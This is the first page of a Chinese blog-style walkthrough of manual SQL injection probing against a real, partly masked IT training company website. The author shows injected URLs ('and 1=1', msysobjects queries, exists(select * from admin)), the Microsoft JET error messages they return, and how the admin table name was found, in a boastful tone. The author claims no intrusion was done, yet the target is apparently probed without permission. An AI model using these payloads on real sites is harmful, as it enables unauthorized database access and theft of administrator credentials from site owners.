手工检测某天IT教育集团网站

 首先说本文只是为了介绍一下网站的检测方法,并未实质上完成入侵

 偶然进入到了某天IT教育集团网站,看到武汉专业思科培训，CCNA、CCNP、CCSP、CCIE认证培训等等内容,叫我回忆起了自己学cisco时候的经历.于是打算看看他们的学员,于是打开了学员风采栏目.(首页 → 服务互动 → 学员采风)

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89

一不小心潜意识的加了个 '单引号' ,接触返回了如下错误提示:

首页 → 服务互动

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'unid = 89'' 中。

/common.asp，行 125

呵呵,有意思,继续探试 and 1=1

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=1

返回正常页面,但是同时也弹出了"防注射系统".看来网站制作人在网站程序方面还是有安全意识地,不过这吓不倒谁,至少我的群名就叫[火力]依然那么猛,go on......

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=2

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89'%20and%20(select%20count(*)%20from%20msysobjects)>0--

首页 → 服务互动
Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'unid = 89' and (select count(*) from msysobjects)>0--' 中。

/common.asp，行 125
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select * from admin)

这个语句是向数据库查询是否存在admin这个表，如果存在则返回正常页面,不存在会返回错误提示.

返回结果如下:

Microsoft JET Database Engine 错误 '80040e37'

Microsoft Jet 数据库引擎找不到输入表或查询 'admin'。 确定它是否存在，以及它的名称的拼写是否正确。

/common.asp，行 125

结果返回的还真是错误提示,看来这常见管理表admin确实受到了足够的重视.经过几翻尝试,最后终于确定了管理表为article_admin , 感谢我的表字典,阿门!

[1] [2] [3] 下一页